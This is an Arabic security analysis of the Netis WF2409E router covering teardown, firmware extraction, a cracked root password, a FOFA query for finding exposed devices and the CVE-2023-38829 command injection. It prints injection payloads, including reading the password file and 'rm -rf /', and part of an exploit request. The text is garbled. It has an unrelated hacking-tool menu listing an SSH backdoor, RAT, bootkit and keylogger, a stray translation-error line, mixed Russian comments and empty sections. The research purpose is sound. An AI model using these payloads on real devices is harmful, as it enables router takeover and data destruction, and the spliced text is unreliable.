
دراسة تحليل أمني عتادي شامل لموجّه الشبكة NETIS WF2409E. من خلال تفكيك الجهاز وتحليله، وتحديد واجهات التصحيح، واستخراج البرنامج الثابت (Firmware)، تم توثيق المسار الكامل للتحليل العتادي، إلى جانب تفاصيل الثغرات والتوصيات الأمنية ذات الصلة، على أمل المساهمة في رفع مستوى أمان أجهزة إنترنت الأشياء.

| الفئة | المعلمة | الوصف |
|---|---|---|
| معلومات الجهاز | الطراز | Netis WF2409E |
| النوع | 300Mbps Wireless N Router | |
| الطاقة | DC 9V/500mA | |
| إصدار الجهاز | V1.8 | |
| إصدار PCB | PB-7189-M02G-20 | |
| تاريخ الإنتاج | 2015-03-23 | |
| بلد الإنتاج | الصين | |
| معرّفات الشبكة | الرقم التسلسلي | 2409EEU5B102714 V1.8 |
| عنوان MAC | W8D398DFB68 | |
| SSID الافتراضي | netis_BDFB68 | |
| كلمة المرور الافتراضية | password | |
| عنوان الإدارة | http://netis.cc | |
| الواجهات المادية | منفذ WAN | 1 (RJ45 أزرق) |
| منافذ LAN | 4 (RJ45 أسود، LAN1-4) | |
| الهوائيات | 3 هوائيات خارجية | |
| مقبس الطاقة | مدخل DC (PWR) | |
| أزرار الوظائف | Default | إعادة الضبط إلى إعدادات المصنع |
| WPS | الإعداد المحمي للشبكة اللاسلكية |



| المعلمة | المواصفات |
|---|---|
| طراز المعالج | RealTek RTL8196E |
| البنية | 16-bit |
| التردد | 380MHz |
| تاريخ الترجمة | 2014.09.29 |
| المعلمة | الوصف |
|---|---|
| نوع المُحمّل | مُحمّل RealTek الخاص |
| عنوان تحميل النواة | 0x80500000 |
| عنوان بدء التنفيذ | 0x80003440 |
| نطاق البحث عن التوقيع | 0x10000-0x170000 |
| المعلمة | القيمة |
|---|---|
| عنوان IP | 192.168.0.1 |
| قناع الشبكة الفرعية | 255.255.255.0 |
| عنوان MAC | 04:8d:38:bd:fb:69 |
| الواجهة اللاسلكية | wlan0 (بما في ذلك va0-va3, vxd) |
| المعلمة | القيمة |
|---|---|
| طراز الجهاز | netis WF2419E_RU |
| إصدار البرنامج الثابت | V2.5.40200 |
| تاريخ البرنامج الثابت | 2016.09.02 |
| إصدار BusyBox | v1.00-pre8 (2015.01.23) |
من المهم ملاحظة أن هذا الجهاز على الأرجح لا يستخدم U-Boot. المؤشرات الرئيسية:
---RealTek(RTL8196E)at 2014.09.29-19:16+0800 v1.0 [16bit](https://github.com/victorique-123/cve-2023-38829-netis-wf2409e_report/blob/master/380MHz)
أوامر Bootloader:
<RealTek> FLR 80000000 0 100 #Чтение из Flash DB 80000000 100 #Просмотр содержимого памяти



/dev/mtdblock1 مثبت كدليل جذر /none مثبت كنظام ملفات العمليات /proctmpfs مثبت كنظام ملفات مؤقت /varتم إعداد نظام الملفات الجذري على النحو التالي:
/dev/mtdblock1يشير هذا إلى استخدام ذاكرة الفلاش MTD كوسيط تخزين، حيث تكون ملفات النظام محمية ومحسّنة الحجم عبر القراءة فقط وضغط squashfs.
تم إعداد نظام ملفات العمليات على النحو التالي:
تم إعداد نظام الملفات المؤقت على النحو التالي:


binwalk -E --save netis.bin


binwalk netis.bin

والحصول على:

| الإزاحة | ترويسة القسم |
|---|---|
| 0x12F0 | ![]() |
| 0x32818 | ![]() |

etc/passwd:
باستخدام خدمة فك تشفير التجزئات https://hashes.com/en/decrypt/hash، تم استعادة كلمة مرور root بنجاح كـ realtek.

web/welcome.htm:هذه هي صفحة الواجهة الإدارية الافتراضية

البحث عن الأجهزة في FOFA عبر الخصائص الموجودة في web/welcome.htm:
أوامر البحث:
body="./images/logo_netis.png" && body="display:block; height:60px; float:left;"


قد يتطلب الوصول إلى لوحة إدارة الجهاز مصادقة باستخدام اسم المستخدم وكلمة المرور

بعد المصادقة الناجحة، يمكن الدخول إلى لوحة الإدارة

أولاً، باستخدام الأمر ~/squashfs-root/web$ find تم العثور على الأدلة المتاحة، وباستخدام Burpsuit تم التحقق من إمكانية الوصول إليها:| | Payload | Code | | Lenth |
| ------ | ------------------------------- | ------- | ----- | --------- |
| 1 | /cgi-bin | 200 | | 167 |
| 2 | /cgi-bin/cgitest.cgi | - | ERROR | - |
| 3 | /script | 200 | | 168 |
| 4 | /script/init.js | 200 | | 1282 |
| 5 | /script/logic.js | 200 | | 65677 |
| 6 | /script/menu.js | 200 | | 4976 |
| 7 | /script/netcore.js | 200 | | 151935 |
| 8 | /script/action.js | 200 | | 182624 |
| 9 | /script/debug.js | 200 | | 28570 |
| ==10== | ==/version.txt== | ==200== | | ==206== |
| ==11== | ==/update.htm== | ==200== | | ==1230== |
| 12 | /config | 200 | | 168 |
| 13 | /config/language_es.js | 200 | | 79333 |
| 14 | /config/language_it.js | 200 | | 76802 |
| 15 | /config/language_id.js | 200 | | 74795 |
| 16 | /config/language_du.js | 200 | | 78782 |
| 17 | /config/language_ma.js | 200 | | 73594 |
| 18 | /config/language_po.js | 200 | | 76458 |
| 19 | /config/language_tu.js | 200 | | 77747 |
| 20 | /config/language_fr.js | 200 | | 78165 |
| 21 | /config/language_ro.js | 200 | | 73621 |
| 22 | /config/language_cz.js | 200 | | 75968 |
| 23 | /config/language_ua.js | 200 | | 98335 |
| 24 | /config/language_us.js | 200 | | 84173 |
| 25 | /config/config.js | 200 | | 75899 |
| 26 | /config/language_ru.js | 200 | | 108998 |
| 27 | /config/language_de.js | 200 | | 78674 |
| 28 | /config/language_pt.js | 200 | | 77954 |
| 29 | /config/language_cn.js | 200 | | 62001 |
| 30 | /config/language_tc.js | 200 | | 74268 |
| 31 | /system_log.txt | 404 | | 330 |
| ==32== | ==/index.htm== | ==200== | | ==4336== |
| 33 | /css | 200 | | 167 |
| 34 | /css/style.css | 200 | | 5441 |
| 35 | /css/netcore.css | 200 | | 11536 |
| 36 | /css/welcome.css | 200 | | 6270 |
| 37 | /Config.tgz | 404 | | 326 |
| 38 | /images | 200 | | 168 |
| 39 | /images/first.png | 200 | | 838 |
| 40 | /images/icon_no.gif | 200 | | 240 |
| 41 | /images/top_right_bg.gif | 200 | | 222 |
| 42 | /images/logo_netis.png | 200 | | 7297 |
| 43 | /images/icon_jian.gif | 200 | | 239 |
| 44 | /images/show_pwd.png | 200 | | 1433 |
| 45 | /images/icon_no1.gif | 200 | | 498 |
| 46 | /images/nextt.png | 200 | | 1026 |
| 47 | /images/lastt.png | 200 | | 845 |
| 48 | /images/icon_intro_internet.gif | 200 | | 6994 |
| 49 | /images/help_b1.gif | 200 | | 540 |
| 50 | /images/high.gif | 200 | | 10846 |
| 51 | /images/yandex_en.png | 200 | | 3519 |
| 52 | /images/help_b1.jpg | 200 | | 620 |
| 53 | /images/back.gif | 200 | | 379 |
| 54 | /images/icon_intro_wireless.jpg | 200 | | 3838 |
| 55 | /images/icon_jian1.gif | 200 | | 490 |
| 56 | /images/left_021.jpg | 200 | | 558 |
| 57 | /images/edit.gif | 200 | | 365 |
| 58 | /images/pre.png | 200 | | 1029 |
| 59 | /images/btn_mobile_setup.jpg | 200 | | 3053 |
| 60 | /images/icon_now.gif | 200 | | 242 |
| 61 | /images/top_right_bg.jpg | 200 | | 223 |
| 62 | /images/bg_intro_bottom.png | 200 | | 3562 |
| 63 | /images/favicon.ico | 200 | | 4458 |
| 64 | /images/btn_quick_setup.jpg | 200 | | 4353 |
| 65 | /images/bg_intro_top.png | 200 | | 3605 |
| 66 | /images/mt-link.gif | 200 | | 5823 |
| 67 | /images/link.gif | 200 | | 1045 |
| 68 | /images/del.gif | 200 | | 313 |
| ==69== | ==/images/Makefile== | ==200== | | ==593== |
| 70 | /images/icon_jia1.gif | 200 | | 490 |
| 71 | /images/blue.jpg | 200 | | 2584 |
| 72 | /images/normal.gif | 200 | | 10818 |
| 73 | /images/yandex.png | 200 | | 2159 |
| 74 | /images/bg_leftmenu.gif | 200 | | 686 |
| 75 | /images/icon_jia.gif | 200 | | 252 |
| 76 | /images/icon_now1.gif | 200 | | 487 |
| ==77== | ==/welcome.htm== | ==200== | | ==30155== |
| ==78== | ==/index.html== | ==200== | | ==326== |
| 79 | /help | 200 | | 166 |
| ==80== | ==/backup.htm== | ==200== | | ==1304== |
المواقع المحتملة لوجود المعلومات:
بعد التحقق، يمكننا العثور على المعلومات التالية في الملف ==/version.txt==:

تم تنفيذ استخراج هذه المعلومات باستخدام سكربت Python:

حاليًا، تم اكتشاف الثغرات الأمنية التالية في هذا الجهاز، ومن بينها ثغرة CVE-2023-38829 التي تمثل ثغرة حقن الأوامر الموجودة في وحدة اختبار الشبكة لجهاز التوجيه NETIS SYSTEMS Router WF2409E في دالتي ping وtraceroute. عبر واجهة الإدارة على الويب، يمكن حقن أوامر ضارة في معاملات هاتين الدالتين، مما يؤدي إلى تنفيذ الأوامر.
للتحقق من وجود هذه الثغرة، قمت بتسجيل الدخول إلى لوحة تحكم جهاز التوجيه واختبرت الثغرة في دالتي ping وtraceroute.
هنا قمت بحقن الأمر cd && ls && cd etc/ && cat passwd، والذي أخرج محتويات ملف كلمات المرور.
فيما يلي مخرجات لوحة تحكم جهاز التوجيه عند حقن الأمر، مما يؤكد وجود الثغرة.

تحليل CVSS 3.1 لثغرات حقن الأوامر المكتشفة:
تقييم المؤشرات الأساسية:
مؤشرات التأثير:


التقييم النهائي: 9.2/10 نقاط، وهو يندرج ضمن فئة «حرجة». CVSS-Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
يعود هذا التقييم المرتفع للثغرة إلى الأسباب التالية:
لنبدأ أولاً بإيجاد الملفات التي قد تحتوي على ثغرات:
find . -name "*.cgi" ./web/cgi-bin/cgitest.cgi ./bin/cgitest.cgi
أفترض أن الثغرات قد تظهر في برامج CGI، لذلك سأحاول أولاً تحليل الملف ./web/cgi-bin/cgitest.cgi باستخدام IDA Pro.
أولاً، نحتاج إلى العثور على مواقع استدعاء الدوال المشابهة؛ ومن خلال البحث تمكنا من العثور على السلسلة «killall ping».
عند تحليل موقع الاستدعاء، يمكن ملاحظة أن البرنامج بعد تهيئة دالتي ping وtraceroute يستدعي /bin/network_test.sh

ومكان وجود الثغرة هو بالتحديد في وحدة اختبار الشبكة. حسنًا، نحتاج إلى تحليل /bin/network_test.sh.
في البداية، يجب إجراء البحث.

نجد الدالة network_test_sh:
......

عند التحليل التفصيلي للدالة، يمكن اكتشاف وحدات تنفيذ الأوامر وحفظ النتائج.

فيها: تنفيذ أمر ping: ping -c %d -s %d %s -W %d > %s &
تنفيذ أمر traceroute: traceroute -I -m %d %s > %s &
loc_4205B8: lw v0, 0x108+var_D4(sp) #прямая загрузка параметров lw a3, 0x108+var_D8(sp) la t9, sprintf #прямой вызов sprintf #отсутствует проверка параметров перед sprintf
### **الاستخدام**
بعد التثبيت، يمكنك تشغيل الأداة باستخدام:
```bash
sudo cpdb
بعد التشغيل، ستظهر القائمة الرئيسية:
[1] Network
[2] System
[3] Exit
اختر خيارًا عن طريق إدخال الرقم:
[?] Enter your choice:
إذا تم اختيار الخيار 1، ستظهر قائمة Network:
توفر خيارات للحصول على معلومات الشبكة، وفحص الشبكة، والتقاط كلمات المرور، إلخ.
فيما يلي قائمة صغيرة من الأمثلة:
Network
├── Local
│ ├── Network Manager # حالة NetworkManager
│ ├── Get active Interface(s) # يعرض الواجهات النشطة
│ ├── Get IP # يعرض عنوان IP الخاص بك
│ ├── Scan ports # يفحص المنافذ على المضيف المحلي
│ └── Sniff passwords # التقاط كلمات المرور على الجهاز المحلي
└── Remote
├── Get external IP # يعرض عنوان IP الخارجي الخاص بك
├── Subnet scan # يفحص الشبكة الفرعية المحددة
└── URL extraction # استخراج جميع عناوين URL من ملف أو دليل
عند اختيار الخيار 2، ستظهر قائمة System:
System
├── System
│ ├── Whoami # يعرض اسم المستخدم الحالي
│ ├── Users # يعرض قائمة المستخدمين
│ ├── CPU infos # يعرض معلومات وحدة المعالجة المركزية
│ ├── Available RAM # يعرض مقدار ذاكرة الوصول العشوائي المتاحة
│ ├── Wifi Passwords # يستخرج كلمات مرور Wi-Fi المحفوظة
│ ├── Browser passwords # يستخرج كلمات مرور المتصفح المحفوظة
│ ├── Screen, Camera, Microphone # يعرض حالة الشاشة والكاميرا والميكروفون
│ ├── UFW # يعرض حالة جدار الحماية UFW
│ ├── Disk usage # يعرض استخدام مساحة القرص
│ └── Uninstall apps # يسرد التطبيقات ويقترح إزالتها
└── Device
├── Add user # يضيف مستخدمًا جديدًا إلى النظام
├── SSH backdoor # ينشئ بابًا خلفيًا عبر SSH دون تغيير كلمة المرور
├── Malware scan # يفحص الملفات في الدليل المحدد بحثًا عن البرامج الضارة
├── RAT # RAT متعدد المنصات (حصان طروادة للوصول عن بُعد)
├── Bootkit # يثبت بوتكيت في قطاع التمهيد
├── Take a webcam picture # يلتقط صورة من كاميرا الويب
├── Log keystrokes (keylogger) # يشغّل مسجل ضربات المفاتيح (keylogger)
├── Lock the device # يقفل الجهاز، مما يجعله غير قابل للاستخدام من قبل المستخدم
├── Dump memory # يقوم بتفريغ ذاكرة الوصول العشوائي
└── Destroy # يدمر النظام بشكل لا رجعة فيه
كما ترى، تغطي الأداة نطاقًا واسعًا من الوظائف المضمنة ويمكن أن تساعد في اختبارات الاختراق أو تدقيق الأمان.```
loc_420574: la $t9, sprintf #также прямой вызов sprintf lw $a2, 0x108+var_D0($sp) #также отсутствует проверка параметров
The input chunk (chunk 6 of 14) appears to be empty — no content was provided to translate. Please resend the chunk text.```
# После построения команды происходит прямое выполнение
la $t9, run_by_system
jalr $t9 ; run_by_system #прямой вызов system для выполнения команды
move $a0, $s1 #отсутствуют проверки безопасности

لا يوجد في الكود تحقق كافٍ من معاملات الإدخال، مما يُشكّل خطرًا محتملًا لحقن الأوامر. يمكن للمهاجم التحكم في معامل IP المُمرَّر لتنفيذ أوامر shell، على سبيل المثال:```
192.168.0.1; rm -rf / #удаление файлов 192.168.0.1 & id & #выполнение произвольных команд
## 11. سكربت الاستغلال
### 11.1. نظرة عامة على السكربت
يستخدم هذا السكربت ثغرة حقن الأوامر في الواجهة الإلكترونية للجهاز لتنفيذ الأوامر عن بُعد عبر إنشاء طلبات HTTP مخصصة. ينفّذ السكربت استغلال الثغرة من خلال طلبي HTTP POST: الطلب الأول يُدخل الأمر، والثاني يحصل على نتيجة التنفيذ.
الحزمة الأولى (netcore_set.cgi) مخصصة لـ: إدخال الأمر وتنفيذه

الحزمة الثانية (netcore_get.cgi) مخصصة لـ: الحصول على نتيجة تنفيذ الأمر

### 11.2 المرحلة الأولى: حقن الأمر
1. تشكيل جسم طلب POST مع المعلمات الرئيسية التالية:```
{ "mode_name": "netcore_set",
"tools_type": "2",
"tools_ip_url": f"| {command}", # точка инъекции команды
"tools_cmd": "1",
"net_tools_set": "1" }
2. إرسال الطلب إلى netcore_get.cgi
3. تحليل حقل tools_results في الاستجابة للحصول على نتيجة تنفيذ الأمر
### 11.4 اختبار السكربتات
لاختبار السكربت، أنشأت ملف `ceshi` على المضيف وحاولت تحميله إلى الجهاز عبر السكربت

تم بنجاح!
في الواقع، تتيح هذه الثغرة الحصول على تحكم كامل في الجهاز، لأن الجهاز يستخدم وصول root افتراضيًا
| المعلمة المفحوصة | الحالة | ملاحظات |
|---|
| مؤشر الطاقة | يعمل | يضيء باستمرار عند التشغيل |
| مؤشرات الشبكة | تعمل | تومض عند الاتصال |
| حالة منفذ WAN | يعمل | اتصال شبكة طبيعي |
| حالة منافذ LAN | تعمل | جميع المنافذ الأربعة تعمل |
| وظيفة WiFi | تعمل | الهوائيات سليمة، الإشارة طبيعية |
| وظيفة WPS | تعمل | الزر يستجيب |
| وظيفة إعادة الضبط | تعمل | زر Default يعمل |
| № | طراز الشريحة | الشركة المصنعة | الوظيفة الرئيسية | المواصفات الفنية | ملاحظات |
|---|
| 1 | EM63A165TS-6G | EtronTech | ذاكرة النظام | - السعة 32 ميجابت - التردد 166 ميجاهرتز - بنية SDRAM - الهيكل TSOP-II | - تُستخدم للتخزين المؤقت للبيانات - تدعم حسابات المعالج الرئيسي |
| 2 | FR9886 61504 | غير معروف | إدارة الطاقة | - الهيكل SOIC-8 - دائرة متكاملة | - DC-DC - مسؤولة عن تنظيم الجهد - تضمن تزويدًا مستقرًا للطاقة للنظام |
| 3 | RTL8196E | Realtek/RMC | المعالج الرئيسي | - بنية MIPS - تصميم SoC - صُنع في تايوان | - المعالج المركزي للنظام - مسؤول عن الحسابات والإدارة الرئيسية - معالجة شبكة مدمجة |
| 4 | MX25L3206E | Macronix | ذاكرة فلاش | - السعة 32 ميجابت (4 ميجابايت) - واجهة SPI - الهيكل SOIC | - تخزين البرنامج الثابت للنظام - حفظ بيانات الإعدادات |
| 5 | RTL8192ER | Realtek/RMC | الاتصال اللاسلكي | - وحدة تحكم WiFi - الهيكل QFN | - معالجة الإشارات اللاسلكية - دعم وظائف WiFi |
| المعلمة | القيمة | القيمة السداسية العشرية |
|---|
| طراز الشريحة | MX25L3205D | - |
| الحجم الإجمالي | 4MB | 0x400000 |
| حجم الكتلة | 64KB | 0x10000 |
| حجم القطاع | 4KB | 0x1000 |
| حجم الصفحة | 256B | 0x100 |
| اسم الخدمة | الحالة | ملاحظات |
|---|
| خادم DHCP | يعمل | طبيعي |
| خادم HTTP (Boa) | يعمل | إعادة تشغيل غير طبيعية |
| IAPP | يعمل | IEEE 802.11f |
| MiniIGD | يعمل | v1.08.1 |
| mini_upnpd | خطأ | الملف غير موجود |
| telnetd | خطأ | الملف غير موجود |
| ota_init.sh | خطأ | الملف غير موجود |
| الأمر | الصيغة | الوظيفة |
|---|
| HELP | ? | عرض المساعدة |
| DB/DW | DB/DW <адрес> <длина> | قراءة الذاكرة بايتًا/كلمةً |
| EB/EW | EB/EW <адрес> <значение> | الكتابة في الذاكرة بايتًا/كلمةً |
| FLR | FLR | قراءة البيانات من الفلاش إلى الذاكرة |
| FLW | FLW <dst_ROM><src_RAM> | كتابة البيانات من الذاكرة إلى الفلاش |
| IPCONFIG | IPCONFIG <IP-адрес> | إعداد عنوان IP |
| LOADADDR | LOADADDR <адрес> | تعيين عنوان التحميل |
| CMP | CMP | مقارنة البيانات في الذاكرة |
| J | J <адрес> | الانتقال إلى التنفيذ |
| MDIOR/MDIOW | MDIOR/W [data] | قراءة/كتابة سجلات PHY |
| PHYR/PHYW | PHYR/W [data] | قراءة/كتابة سجلات PHY (طريقة بديلة) |
| PORT1 | PORT1 | اختبار تصحيح المنفذ 1 |
| AUTOBURN | AUTOBURN 0/1 | التحكم في الوميض التلقائي |
| نوع الأمر | الأوامر المتاحة |
|---|
| الأوامر الأساسية | ., :, cd, help, exit |
| التحكم في التنفيذ | break, continue, eval, exec |
| عمليات المتغيرات | export, read, readonly, set, shift |
| إدارة العمليات | times, trap, wait |
| إدارة الصلاحيات | login, newgrp, umask |
| الفئة | الأدوات | الوظيفة |
|---|
| أدوات الشبكة | iptables ip6tables brctl ifconfig | إعداد جدار الحماية، جدار حماية IPv6، إدارة الجسور، إعداد واجهات الشبكة |
| إدارة النظام | busybox ps kill mount | مجموعة الأدوات الأساسية، عرض العمليات، إدارة العمليات، تركيب نظام الملفات |
| اتصال VPN | pppd pptp l2tpd pptpctrl | خادم PPP، عميل PPTP، خادم L2TP، إدارة PPTP |
| إدارة الاتصال اللاسلكي | iwcontrol iwpriv wlanapp.sh wps_init.sh | التحكم في الاتصال اللاسلكي، أوامر لاسلكية خاصة، إدارة تطبيقات لاسلكية، تهيئة WPS |
| سكريبتات جدار الحماية | firewall.sh firewall_ipv6.sh firewall_pptp.sh | جدار الحماية الرئيسي، جدار حماية IPv6، جدار حماية PPTP |
| DHCP/DNS | dhcpc.sh dhcpd.sh dnrd | عميل DHCP، خادم DHCP، إعادة توجيه DNS |
| خدمة الويب | boa webs cgitest.cgi | خادم الويب، إدارة الويب، اختبار CGI |
| المسار | نوع المعلومات | الوصف |
|---|
| /proc/cpuinfo | معلومات عن المعالج | معلومات مفصلة عن المعالج |
| /proc/meminfo | معلومات عن الذاكرة | حالة استخدام ذاكرة النظام |
| /proc/mtd | معلومات عن الأقسام | تقسيم ذاكرة الفلاش |
| /proc/net/* | معلومات الشبكة | حالة واجهات واتصالات الشبكة |
| /proc/sys/* | معلمات النظام | معلمات النظام القابلة للضبط |
| /proc/version | معلومات الإصدار | معلومات إصدار النواة |
| المكوّن | الوصف | المواصفات الفنية |
|---|
| RTL8196E | المعالج الرئيسي | - بنية MIPS - تصميم SoC - صُنع في تايوان - المعالج المركزي للنظام - مسؤول عن الحسابات والإدارة الرئيسية - وظائف معالجة شبكة مدمجة |
| EM63A165TS-6G | ذاكرة النظام | - السعة 32 ميجابت - التردد 166 ميجاهرتز - بنية SDRAM - الهيكل TSOP-II - التخزين المؤقت لبيانات النظام - تدعم حسابات المعالج الرئيسي |
| MX25L3206E | ذاكرة الفلاش | - السعة 32 ميجابت (4 ميجابايت) - واجهة SPI - الهيكل SOIC - تخزين البرنامج الثابت للنظام - حفظ بيانات الإعدادات |
| RTL8192ER | الشبكة اللاسلكية | - وحدة تحكم WiFi - الهيكل QFN - معالجة الإشارات اللاسلكية - دعم WiFi |
| FR9886 61504 | إدارة الطاقة | - الهيكل SOIC-8 - دائرة متكاملة - DC-DC - مسؤولة عن تنظيم الجهد - تضمن تزويدًا مستقرًا للطاقة للنظام |
| الملف | الإزاحة (عشرية) | الإزاحة (سداسية عشرية) | الوصف | معلومات إضافية |
|---|
| netis.bin | 4848 | 0x12F0 | بيانات LZMA مضغوطة | حجم القاموس: 8388608 بايت، الحجم بعد فك الضغط: 56464 بايت؛ يلزم تحليل المحتوى بعد فك الضغط |
| netis.bin | 206872 | 0x32818 | بيانات LZMA مضغوطة | حجم القاموس: 8388608 بايت، الحجم بعد فك الضغط: 3278684 بايت؛ يحتوي على نواة Linux 2.6.30 كاملة |
| netis.bin | 1507328 | 0x170000 | نظام ملفات SquashFS | ترتيب البايتات الأقل أهمية، ضغط gzip، الحجم: 2628241 بايت |
| 0x170000 | ![]() |
| Payload | Code | Lenth |
|---|
| ==10== | ==/version.txt== | ==200== | ==206== |
| ==11== | ==/update.htm== | ==200== | ==1230== |
| ==32== | ==/index.htm== | ==200== | ==4336== |
| ==69== | ==/images/Makefile== | ==200== | ==593== |
| ==77== | ==/welcome.htm== | ==200== | ==30155== |
| ==78== | ==/index.html== | ==200== | ==326== |
| ==80== | ==/backup.htm== | ==200== | ==1304== |
| رقم الثغرة | نوع الثغرة | الطراز | الإصدار | التقرير/الاستغلال |
|---|
| CVE-2023-42336 | كشف المعلومات الحساسة | Netis | wf2409e_firmware < 1.0.1.705 wf3409e < v4 | https://github.com/adhikara13/CVE/blob/main/netis_WF2409E/Root_Hard_Code.md |
| CVE-2023-38829 | تنفيذ التعليمات البرمجية عن بُعد | Netis | wf2409e_firmware < 3.6.42541 wf3409e < - | https://github.com/adhikara13/CVE-2023-38829-NETIS-WF2409E |